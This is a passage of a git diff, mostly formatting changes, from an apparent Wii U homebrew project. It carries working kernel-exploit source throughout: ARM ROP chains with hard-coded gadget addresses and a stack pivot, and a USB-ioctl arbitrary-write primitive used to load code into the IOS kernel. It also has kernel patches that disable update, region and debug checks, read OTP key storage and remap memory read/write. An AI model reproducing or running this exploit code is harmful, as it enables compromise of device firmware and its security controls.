0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + ARM_CODE_BASE, // 0x1E8 our code destination address + 0x0, // 0x1EC + 0x0, // 0x1F0 + 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} + 0x0, // 0x1F8 + sizeof(ios_kernel), // 0x1FC our code size + 0x0, // 0x200 + 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} + 0x00140000, // 0x208 our code source location + 0x08131D04, // 0x20C KERNEL_MEMCPY address + 0x0, // 0x210 + 0x0, // 0x214 + 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) 0x0, 0x0, 0x101312D0, }; static const int second_chain[] = { - 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} - CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination - 0x0, // 0x08 - 0x0, // 0x0C - 0x101063db, // 0x10 POP {R1,R2,R5,PC} - 0x00130000, // 0x14 source - sizeof(final_chain), // 0x18 length - 0x0, // 0x1C - 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x101236f3, // 0x2C POP {R1-R7,PC} - 0x0, // 0x30 arg - 0x101001DC, // 0x34 stackptr - 0x68, // 0x38 stacksize - 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x40 - 0x0, // 0x44 - 0x0, // 0x48 - 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x50 - 0x0, // 0x54 - 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x5C - 0x0, // 0x60 - IOS_CREATETHREAD, // 0x64 - 0x1, // 0x68 priority - 0x2, // 0x6C flags - 0x0, // 0x70 - 0x0, // 0x74 - 0x101063db, // 0x78 POP {R1,R2,R5,PC} - 0x0, // 0x7C - -(0x240 + 0x18 + 0xF000), // 0x80 stack offset - 0x0, // 0x84 - 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} + 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} + CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination + 0x0, // 0x08 + 0x0, // 0x0C + 0x101063db, // 0x10 POP {R1,R2,R5,PC} + 0x00130000, // 0x14 source + sizeof(final_chain), // 0x18 length + 0x0, // 0x1C + 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x101236f3, // 0x2C POP {R1-R7,PC} + 0x0, // 0x30 arg + 0x101001DC, // 0x34 stackptr + 0x68, // 0x38 stacksize + 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x40 + 0x0, // 0x44 + 0x0, // 0x48 + 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x50 + 0x0, // 0x54 + 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x5C + 0x0, // 0x60 + IOS_CREATETHREAD, // 0x64 + 0x1, // 0x68 priority + 0x2, // 0x6C flags + 0x0, // 0x70 + 0x0, // 0x74 + 0x101063db, // 0x78 POP {R1,R2,R5,PC} + 0x0, // 0x7C + -(0x240 + 0x18 + 0xF000), // 0x80 stack offset + 0x0, // 0x84 + 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} 0x0, 0x0, 0x0, 0x00110000 - 0x44, // 0x8C 0x00110010, // 0x90 - 0x0, // 0x94 - 0x0, // 0x98 - 0x0, // 0x9C - 0x0, // 0xA0 - 0x0, // 0xA4 - 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack - 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x94 + 0x0, // 0x98 + 0x0, // 0x9C + 0x0, // 0xA0 + 0x0, // 0xA4 + 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack + 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} 0x0, 0x0, 0x1012EA68, // 0xAC stack pivot @@ -313,10 +313,10 @@ static void uhs_exploit_init(int dev_uhs_0_handle) { memcpy((char *) (0xF4140000), ios_kernel, sizeof(ios_kernel)); payload_info_t *payloads = (payload_info_t *) 0xF4148000; - payloads->size = sizeof(ios_usb); + payloads->size = sizeof(ios_usb); memcpy(payloads->data, ios_usb, payloads->size); - payloads = (payload_info_t *) 0xF4160000; + payloads = (payload_info_t *) 0xF4160000; payloads->size = sizeof(ios_mcp); memcpy(payloads->data, ios_mcp, payloads->size); @@ -331,10 +331,10 @@ static void uhs_exploit_init(int dev_uhs_0_handle) { } static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) { - ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes - DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) - OSSleepTicks(0x200000); //! Improves stability - int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 + ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes + DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) + OSSleepTicks(0x200000); //! Improves stability + int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 int output_buffer[32]; return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); } diff --git a/source/ios_kernel/source/elf_abi.h b/source/ios_kernel/source/elf_abi.h index 4d9c796..aa119af 100644 --- a/source/ios_kernel/source/elf_abi.h +++ b/source/ios_kernel/source/elf_abi.h @@ -1,3 +1,4 @@ +// clang-format off /* * Copyright (c) 1995, 1996, 2001, 2002 * Erik Theisen. All rights reserved. diff --git a/source/ios_kernel/source/elf_patcher.c b/source/ios_kernel/source/elf_patcher.c index 45faa91..2b33733 100644 --- a/source/ios_kernel/source/elf_patcher.c +++ b/source/ios_kernel/source/elf_patcher.c @@ -21,16 +21,14 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include "types.h" #include "elf_abi.h" +#include "types.h" #include "utils.h" static Elf32_Phdr *get_section(u32 data, u32 vaddr) { Elf32_Ehdr *ehdr = (Elf32_Ehdr *) data; - if (!IS_ELF (*ehdr) - || (ehdr->e_type != ET_EXEC) - || (ehdr->e_machine != EM_ARM)) { + if (!IS_ELF(*ehdr) || (ehdr->e_type != ET_EXEC) || (ehdr->e_machine != EM_ARM)) { return 0; } diff --git a/source/ios_kernel/source/elf_patcher.h b/source/ios_kernel/source/elf_patcher.h index 1be026f..b860b44 100644 --- a/source/ios_kernel/source/elf_patcher.h +++ b/source/ios_kernel/source/elf_patcher.h @@ -26,10 +26,10 @@ #include "types.h" -#define ARM_B(addr, func) (0xEA000000 | ((((u32)(func) - (u32)(addr) - 8) >> 2) & 0x00FFFFFF)) // +-32MB -#define ARM_BL(addr, func) (0xEB000000 | ((((u32)(func) - (u32)(addr) - 8) >> 2) & 0x00FFFFFF)) // +-32MB -#define THUMB_B(addr, func) ((0xE000 | ((((u32)(func) - (u32)(addr) - 4) >> 1) & 0x7FF))) // +-2KB -#define THUMB_BL(addr, func) ((0xF000F800 | ((((u32)(func) - (u32)(addr) - 4) >> 1) & 0x0FFF)) | ((((u32)(func) - (u32)(addr) - 4) << 4) & 0x7FFF000)) // +-4MB +#define ARM_B(addr, func) (0xEA000000 | ((((u32) (func) - (u32) (addr) -8) >> 2) & 0x00FFFFFF)) // +-32MB +#define ARM_BL(addr, func) (0xEB000000 | ((((u32) (func) - (u32) (addr) -8) >> 2) & 0x00FFFFFF)) // +-32MB +#define THUMB_B(addr, func) ((0xE000 | ((((u32) (func) - (u32) (addr) -4) >> 1) & 0x7FF))) // +-2KB +#define THUMB_BL(addr, func) ((0xF000F800 | ((((u32) (func) - (u32) (addr) -4) >> 1) & 0x0FFF)) | ((((u32) (func) - (u32) (addr) -4) << 4) & 0x7FFF000)) // +-4MB typedef struct { u32 address; diff --git a/source/ios_kernel/source/fsa.c b/source/ios_kernel/source/fsa.c index a17b3d8..6f8529e 100644 --- a/source/ios_kernel/source/fsa.c +++ b/source/ios_kernel/source/fsa.c @@ -24,13 +24,13 @@ #include "types.h" #include "utils.h" -#define svcAlloc ((void *(*)(u32 heapid, u32 size))0x081234E4) -#define svcAllocAlign ((void *(*)(u32 heapid, u32 size, u32 align))0x08123464) -#define svcFree ((void *(*)(u32 heapid, void *ptr))0x08123830) -#define svcOpen ((int (*)(const char* name, int mode))0x0812940C) -#define svcClose ((int (*)(int fd))0x08129368) -#define svcIoctl ((int (*)(int fd, u32 request, void* input_buffer, u32 input_buffer_len, void* output_buffer, u32 output_buffer_len))0x081290E0) -#define svcIoctlv ((int (*)(int fd, u32 request, u32 vector_count_in, u32 vector_count_out, iovec_s* vector))0x0812903C) +#define svcAlloc ((void *(*) (u32 heapid, u32 size)) 0x081234E4) +#define svcAllocAlign ((void *(*) (u32 heapid, u32 size, u32 align)) 0x08123464) +#define svcFree ((void *(*) (u32 heapid, void *ptr)) 0x08123830) +#define svcOpen ((int (*)(const char *name, int mode)) 0x0812940C) +#define svcClose ((int (*)(int fd)) 0x08129368) +#define svcIoctl ((int (*)(int fd, u32 request, void *input_buffer, u32 input_buffer_len, void *output_buffer, u32 output_buffer_len)) 0x081290E0) +#define svcIoctlv ((int (*)(int fd, u32 request, u32 vector_count_in, u32 vector_count_out, iovec_s *vector)) 0x0812903C) typedef struct { void *ptr; @@ -73,8 +73,8 @@ static int FSA_Close(int fd) { } static int FSA_RawOpen(int fd, const char *device_path, int *outHandle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; kernel_strncpy((char *) &inbuf[0x01], device_path, 0x27F); @@ -88,8 +88,8 @@ static int FSA_RawOpen(int fd, const char *device_path, int *outHandle) { } static int FSA_RawClose(int fd, int device_handle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = device_handle; @@ -101,12 +101,12 @@ static int FSA_RawClose(int fd, int device_handle) { } static int FSA_RawRead(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_offset, int device_handle) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; // note : offset_bytes = blocks_offset * size_bytes inbuf[0x08 / 4] = (blocks_offset >> 32); @@ -131,12 +131,12 @@ static int FSA_RawRead(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_o } static int FSA_RawWrite(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_offset, int device_handle) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; inbuf[0x08 / 4] = (blocks_offset >> 32); inbuf[0x0C / 4] = (blocks_offset & 0xFFFFFFFF); @@ -218,4 +218,3 @@ int FSA_SDWriteRawSectors(const void *buffer, u32 sector, u32 num_sectors) { return res; } - diff --git a/source/ios_kernel/source/fsa.h b/source/ios_kernel/source/fsa.h index c12f663..2df262b 100644 --- a/source/ios_kernel/source/fsa.h +++ b/source/ios_kernel/source/fsa.h @@ -26,25 +26,25 @@ #include "types.h" -#define NAND_DUMP_SIGNATURE_SECTOR 0x01 -#define NAND_MAX_DESC_TYPES 5 +#define NAND_DUMP_SIGNATURE_SECTOR 0x01 +#define NAND_MAX_DESC_TYPES 5 -#define NAND_DUMP_SIGNATURE 0x4841585844554d50ULL // HAXXDUMP +#define NAND_DUMP_SIGNATURE 0x4841585844554d50ULL // HAXXDUMP -#define NAND_DESC_TYPE_SLC 0x534c4320 // 'SLC ' -#define NAND_DESC_TYPE_SLCCMPT 0x534c4332 // 'SLC2' -#define NAND_DESC_TYPE_MLC 0x4d4c4320 // 'MLC ' -#define NAND_DESC_TYPE_SEEPROM 0x45455052 // 'EEPR' -#define NAND_DESC_TYPE_OTP 0x4f545020 // 'OTP ' +#define NAND_DESC_TYPE_SLC 0x534c4320 // 'SLC ' +#define NAND_DESC_TYPE_SLCCMPT 0x534c4332 // 'SLC2' +#define NAND_DESC_TYPE_MLC 0x4d4c4320 // 'MLC ' +#define NAND_DESC_TYPE_SEEPROM 0x45455052 // 'EEPR' +#define NAND_DESC_TYPE_OTP 0x4f545020 // 'OTP ' typedef struct _stdio_nand_desc_t { - u32 nand_type; // nand type - u32 base_sector; // base sector of dump - u32 sector_count; // sector count in SDIO sectors + u32 nand_type; // nand type + u32 base_sector; // base sector of dump + u32 sector_count; // sector count in SDIO sectors } __attribute__((packed)) stdio_nand_desc_t; typedef struct _sdio_nand_signature_sector_t { - u64 signature; // HAXXDUMP + u64 signature; // HAXXDUMP stdio_nand_desc_t nand_descriptions[NAND_MAX_DESC_TYPES]; } __attribute__((packed)) sdio_nand_signature_sector_t; diff --git a/source/ios_kernel/source/instant_patches.c b/source/ios_kernel/source/instant_patches.c index 606c960..967b3dc 100644 --- a/source/ios_kernel/source/instant_patches.c +++ b/source/ios_kernel/source/instant_patches.c @@ -21,12 +21,12 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include "utils.h" -#include "types.h" -#include "elf_patcher.h" -#include "kernel_patches.h" -#include "ios_mcp_patches.h" #include "../../ios_mcp/ios_mcp_syms.h" +#include "elf_patcher.h" +#include "ios_mcp_patches.h" +#include "kernel_patches.h" +#include "types.h" +#include "utils.h" typedef struct { u32 paddr; @@ -37,9 +37,9 @@ typedef struct { u32 cached; } ios_map_shared_info_t; -#define mcp_rodata_phys(addr) ((u32)(addr) - 0x05060000 + 0x08220000) -#define mcp_data_phys(addr) ((u32)(addr) - 0x05074000 + 0x08234000) -#define acp_phys(addr) ((u32)(addr) - 0xE0000000 + 0x12900000) +#define mcp_rodata_phys(addr) ((u32) (addr) -0x05060000 + 0x08220000) +#define mcp_data_phys(addr) ((u32) (addr) -0x05074000 + 0x08234000) +#define acp_phys(addr) ((u32) (addr) -0xE0000000 + 0x12900000) void instant_patches_setup(void) { // apply IOS ELF launch hook @@ -62,13 +62,13 @@ void instant_patches_setup(void) { *(volatile u32 *) 0x081430B4 = 1; // fix 10 minute timeout that crashes MCP after 10 minutes of booting - *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT + *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT kernel_memset((void *) (0x050BD000 - 0x05000000 + 0x081C0000), 0, 0x2F00); // allow custom bootLogoTex and bootMovie.h264 - *(volatile u32 *) (0xE0030D68 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 - *(volatile u32 *) (0xE0030D34 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 + *(volatile u32 *) (0xE0030D68 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 + *(volatile u32 *) (0xE0030D34 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 // Patch update check *(volatile u32 *) (0xe22830e0 - 0xe2280000 + 0x13140000) = 0x00000000; @@ -76,9 +76,9 @@ void instant_patches_setup(void) { *(volatile u32 *) (0xe204fb68 - 0xe2000000 + 0x12EC0000) = 0xe3a00000; // allow any region title launch - *(volatile u32 *) (0xE0030498 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 + *(volatile u32 *) (0xE0030498 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 // Patch CheckTitleLaunch to ignore gamepad connected result - *(volatile u32 *) (0xE0030868 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 + *(volatile u32 *) (0xE0030868 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 *(volatile u32 *) (0x050254D6 - 0x05000000 + 0x081C0000) = THUMB_BL(0x050254D6, MCP_LoadFile_patch); *(volatile u32 *) (0x05025242 - 0x05000000 + 0x081C0000) = THUMB_BL(0x05025242, MCP_ioctl100_patch); @@ -110,19 +110,19 @@ void instant_patches_setup(void) { *(volatile u32 *) (0x050BC580 - 0x05000000 + 0x081C0000) = 0; ios_map_shared_info_t map_info; - map_info.paddr = 0x050BD000 - 0x05000000 + 0x081C0000; - map_info.vaddr = 0x050BD000; - map_info.size = 0x3000; - map_info.domain = 1; // MCP - map_info.type = 3; // 0 = undefined, 1 = kernel only, 2 = read only, 3 = read/write + map_info.paddr = 0x050BD000 - 0x05000000 + 0x081C0000; + map_info.vaddr = 0x050BD000; + map_info.size = 0x3000; + map_info.domain = 1; // MCP + map_info.type = 3; // 0 = undefined, 1 = kernel only, 2 = read only, 3 = read/write map_info.cached = 0xFFFFFFFF; - _iosMapSharedUserExecution(&map_info); // actually a bss section but oh well it will have read/write + _iosMapSharedUserExecution(&map_info); // actually a bss section but oh well it will have read/write - map_info.paddr = 0x05116000 - 0x05100000 + 0x13D80000; - map_info.vaddr = 0x05116000; - map_info.size = 0x4000; - map_info.domain = 1; // MCP - map_info.type = 3; // 0 = undefined, 1 = kernel only, 2 = read only, 3 = read write + map_info.paddr = 0x05116000 - 0x05100000 + 0x13D80000; + map_info.vaddr = 0x05116000; + map_info.size = 0x4000; + map_info.domain = 1; // MCP + map_info.type = 3; // 0 = undefined, 1 = kernel only, 2 = read only, 3 = read write map_info.cached = 0xFFFFFFFF; _iosMapSharedUserExecution(&map_info); } diff --git a/source/ios_kernel/source/ios_mcp_patches.c b/source/ios_kernel/source/ios_mcp_patches.c index 3f09cbd..79a6780 100644 --- a/source/ios_kernel/source/ios_mcp_patches.c +++ b/source/ios_kernel/source/ios_mcp_patches.c @@ -21,13 +21,13 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include "types.h" -#include "elf_patcher.h" #include "ios_mcp_patches.h" #include "../../ios_mcp/ios_mcp.bin.h" #include "../../ios_mcp/ios_mcp_syms.h" +#include "elf_patcher.h" +#include "types.h" -#define MCP_CODE_BASE_PHYS_ADDR (-0x05100000 + 0x13D80000) +#define MCP_CODE_BASE_PHYS_ADDR (-0x05100000 + 0x13D80000) extern const patch_table_t mcp_patches_table[]; extern const patch_table_t mcp_patches_table_end[]; diff --git a/source/ios_kernel/source/ios_mcp_patches.h b/source/ios_kernel/source/ios_mcp_patches.h index 75b9729..eb5b9d9 100644 --- a/source/ios_kernel/source/ios_mcp_patches.h +++ b/source/ios_kernel/source/ios_mcp_patches.h @@ -24,7 +24,9 @@ #ifndef _MCP_PATCHES_H_ #define _MCP_PATCHES_H_ -#define MCP_LAUNCH_IMG_PHYS_ADDR (0x27000000) +#include "types.h" + +#define MCP_LAUNCH_IMG_PHYS_ADDR (0x27000000) u32 mcp_get_phys_code_base(void); diff --git a/source/ios_kernel/source/kernel_patches.c b/source/ios_kernel/source/kernel_patches.c index 43590b6..eaa528f 100644 --- a/source/ios_kernel/source/kernel_patches.c +++ b/source/ios_kernel/source/kernel_patches.c @@ -21,14 +21,14 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include "types.h" +#include "kernel_patches.h" #include "../../common/kernel_commands.h" #include "elf_patcher.h" -#include "ios_mcp_patches.h" -#include "kernel_patches.h" #include "fsa.h" -#include "utils.h" +#include "ios_mcp_patches.h" #include "thread.h" +#include "types.h" +#include "utils.h" extern void __KERNEL_CODE_START(void); @@ -40,24 +40,24 @@ extern const patch_table_t kernel_patches_table_end[]; static const u32 mcpIoMappings_patch[] = { // vaddr paddr size ? ? ? - 0x0D000000, 0x0D000000, 0x001C0000, 0x00000000, 0x00000003, 0x00000000, // mapping 1 - 0x0D800000, 0x0D800000, 0x001C0000, 0x00000000, 0x00000003, 0x00000000, // mapping 2 - 0x0C200000, 0x0C200000, 0x00100000, 0x00000000, 0x00000003, 0x00000000 // mapping 3 - }; + 0x0D000000, 0x0D000000, 0x001C0000, 0x00000000, 0x00000003, 0x00000000, // mapping 1 + 0x0D800000, 0x0D800000, 0x001C0000, 0x00000000, 0x00000003, 0x00000000, // mapping 2 + 0x0C200000, 0x0C200000, 0x00100000, 0x00000000, 0x00000003, 0x00000000 // mapping 3 +}; static const u32 KERNEL_MCP_IOMAPPINGS_STRUCT[] = { - (u32) mcpIoMappings_patch, // ptr to iomapping structs - 0x00000003, // number of iomappings - 0x00000001 // pid (MCP) - }; + (u32) mcpIoMappings_patch, // ptr to iomapping structs + 0x00000003, // number of iomappings + 0x00000001 // pid (MCP) +}; -ThreadContext_t** currentThreadContext = (ThreadContext_t**) 0x08173ba0; -uint32_t* domainAccessPermissions = (uint32_t*) 0x081a4000; +ThreadContext_t **currentThreadContext = (ThreadContext_t **) 0x08173ba0; +uint32_t *domainAccessPermissions = (uint32_t *) 0x081a4000; int kernel_syscall_0x81(u32 command, u32 arg1, u32 arg2, u32 arg3) { int result = 0; - int level = disable_interrupts(); + int level = disable_interrupts(); set_domain_register(domainAccessPermissions[0]); // 0 = KERNEL switch (command) { @@ -78,8 +78,8 @@ int kernel_syscall_0x81(u32 command, u32 arg1, u32 arg2, u32 arg3) { break; } case KERNEL_READ_OTP: { - int (*read_otp_internal)(int index, void* out_buf, u32 size) = (int (*)(int, void*, u32)) 0x08120248; - read_otp_internal(0, (void*)(arg1), 0x400); + int (*read_otp_internal)(int index, void *out_buf, u32 size) = (int (*)(int, void *, u32)) 0x08120248; + read_otp_internal(0, (void *) (arg1), 0x400); break; } default: { @@ -98,7 +98,7 @@ void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H) { void (*kernel_launch_bootrom)(u32 launch_address, u32 L, u32 C, u32 H) = (void *) 0x0812A050; if (*(u32 *) (launch_address - 0x300 + 0x1AC) == 0x00DFD000) { - int level = disable_interrupts(); + int level = disable_interrupts(); unsigned int control_register = disable_mmu(); u32 ios_elf_start = launch_address + 0x804 - 0x300; @@ -129,23 +129,23 @@ void kernel_run_patches(u32 ios_elf_start) { section_write_word(ios_elf_start, 0xe22830e0, 0x00000000); section_write_word(ios_elf_start, 0xe22b2a78, 0x00000000); section_write_word(ios_elf_start, 0xe204fb68, 0xe3a00000); - + // patch MCP syslog debug mode check section_write_word(ios_elf_start, 0x050290d8, 0x20004770); - + // Write magic word to disable custom IPC section_write_word(ios_elf_start, 0x050290dc, 0x42424242); - + // give us bsp::ee:read permission for PPC section_write_word(ios_elf_start, 0xe6044db0, 0x000001F0); - + // patch TEST debug mode check //section_write_word(ios_elf_start, 0xe4016a78, 0xe3a00000); section_write_word(ios_elf_start, 0xe4007828, 0xe3a00000); - + // Patch FS to syslog everything section_write_word(ios_elf_start, 0x107F5720, ARM_B(0x107F5720, 0x107F0C84)); - + // Patch MCP to syslog everything section_write_word(ios_elf_start, 0x05055438, ARM_B(0x05055438, 0x0503dcf8)); @@ -154,4 +154,3 @@ void kernel_run_patches(u32 ios_elf_start) { u32 patch_count = (u32) (((u8 *) kernel_patches_table_end) - ((u8 *) kernel_patches_table)) / sizeof(patch_table_t); patch_table_entries(ios_elf_start, kernel_patches_table, patch_count); } - diff --git a/source/ios_kernel/source/kernel_patches.h b/source/ios_kernel/source/kernel_patches.h index 03240fd..f8a05a8 100644 --- a/source/ios_kernel/source/kernel_patches.h +++ b/source/ios_kernel/source/kernel_patches.h @@ -24,6 +24,8 @@ #ifndef _KERNEL_PATCHES_H #define _KERNEL_PATCHES_H +#include "types.h" + int kernel_init_otp_buffer(u32 sd_sector, int tagValid); int kernel_syscall_0x81(u32 command, u32 arg1, u32 arg2, u32 arg3); diff --git a/source/ios_kernel/source/main.c b/source/ios_kernel/source/main.c index 4f16032..095a734 100644 --- a/source/ios_kernel/source/main.c +++ b/source/ios_kernel/source/main.c @@ -21,18 +21,19 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ +#include "instant_patches.h" +#include "ios_mcp_patches.h" #include "types.h" #include "utils.h" -#include "ios_mcp_patches.h" -#include "instant_patches.h" -#define USB_PHYS_CODE_BASE 0x101312D0 +#define USB_PHYS_CODE_BASE 0x101312D0 typedef struct { u32 size; u8 data[0]; } payload_info_t; +// clang-format off static const char repairData_set_fault_behavior[] = { 0xE1, 0x2F, 0xFF, 0x1E, 0xE9, 0x2D, 0x40, 0x30, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x40, 0x00, 0xE5, 0x92, 0x30, 0x54, 0xE1, 0xA0, 0x50, 0x01, 0xE3, 0x53, 0x00, 0x01, 0x0A, 0x00, 0x00, 0x02, @@ -56,11 +57,12 @@ static const char repairData_usb_root_thread[] = { 0xE2, 0x4D, 0xDE, 0x17, 0xEB, 0x00, 0xB9, 0x92, 0xE3, 0xA0, 0x10, 0x00, 0xE3, 0xA0, 0x20, 0x03, 0xE5, 0x9F, 0x0E, 0x68, 0xEB, 0x00, 0xB3, 0x20, }; +// clang-format on int _main() { - void (*invalidate_icache)() = (void (*)()) 0x0812DCF0; + void (*invalidate_icache)() = (void (*)()) 0x0812DCF0; void (*invalidate_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120164; - void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160; + void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160; flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache diff --git a/source/ios_kernel/source/thread.h b/source/ios_kernel/source/thread.h index 65d41ab..4d10d2a 100644 --- a/source/ios_kernel/source/thread.h +++ b/source/ios_kernel/source/thread.h @@ -1,14 +1,14 @@ #pragma once -#include #include +#include typedef struct ThreadContext { uint32_t cspr; uint32_t gpr[14]; uint32_t lr; uint32_t pc; - struct ThreadContext* threadQueueNext; + struct ThreadContext *threadQueueNext; uint32_t maxPriority; uint32_t priority; uint32_t state; @@ -16,18 +16,18 @@ typedef struct ThreadContext { uint32_t id; uint32_t flags; uint32_t exitValue; - struct ThreadContext** joinQueue; - struct ThreadContext** threadQueue; + struct ThreadContext **joinQueue; + struct ThreadContext **threadQueue; uint8_t unk1[56]; - void* stackPointer; + void *stackPointer; uint8_t unk2[8]; - void* sysStackAddr; - void* userStackAddr; + void *sysStackAddr; + void *userStackAddr; uint32_t userStackSize; - void* threadLocalStorage; + void *threadLocalStorage; uint32_t profileCount; uint32_t profileTime; } ThreadContext_t; static_assert(sizeof(ThreadContext_t) == 0xC8, "ThreadContext_t: different size than expected"); -extern ThreadContext_t** currentThreadContext; +extern ThreadContext_t **currentThreadContext; diff --git a/source/ios_kernel/source/utils.c b/source/ios_kernel/source/utils.c index 03cd42f..a1b1b42 100644 --- a/source/ios_kernel/source/utils.c +++ b/source/ios_kernel/source/utils.c @@ -30,7 +30,7 @@ void reverse_memcpy(void *dst, const void *src, unsigned int size) { if ((size >= 4) && !((dst - src) & 3)) { const unsigned int *src_p32; unsigned int *dst_p32; - unsigned int endDst = ((unsigned int) dst) + size; + unsigned int endDst = ((unsigned int) dst) + size; unsigned int endRest = endDst & 3; if (endRest) { diff --git a/source/ios_kernel/source/utils.h b/source/ios_kernel/source/utils.h index 6a83e9d..d905625 100644 --- a/source/ios_kernel/source/utils.h +++ b/source/ios_kernel/source/utils.h @@ -24,30 +24,37 @@ #ifndef _UTILS_H #define _UTILS_H -#define ALIGN4(x) (((x) + 3) & ~3) +#define ALIGN4(x) (((x) + 3) & ~3) -#define kernel_memcpy ((void * (*)(void*, const void*, int))0x08131D04) -#define kernel_memset ((void *(*)(void*, int, unsigned int))0x08131DA0) -#define kernel_strncpy ((char *(*)(char*, const char*, unsigned int))0x081329B8) -#define disable_interrupts ((int(*)())0x0812E778) -#define enable_interrupts ((int(*)(int))0x0812E78C) -#define kernel_bsp_command_5 ((int (*)(const char*, int offset, const char*, int size, void *buffer))0x0812EC40) +#define kernel_memcpy ((void *(*) (void *, const void *, int) ) 0x08131D04) +#define kernel_memset ((void *(*) (void *, int, unsigned int) ) 0x08131DA0) +#define kernel_strncpy ((char *(*) (char *, const char *, unsigned int) ) 0x081329B8) +#define disable_interrupts ((int (*)()) 0x0812E778) +#define enable_interrupts ((int (*)(int)) 0x0812E78C) +#define kernel_bsp_command_5 ((int (*)(const char *, int offset, const char *, int size, void *buffer)) 0x0812EC40) void reverse_memcpy(void *dest, const void *src, unsigned int size); static inline unsigned int disable_mmu(void) { 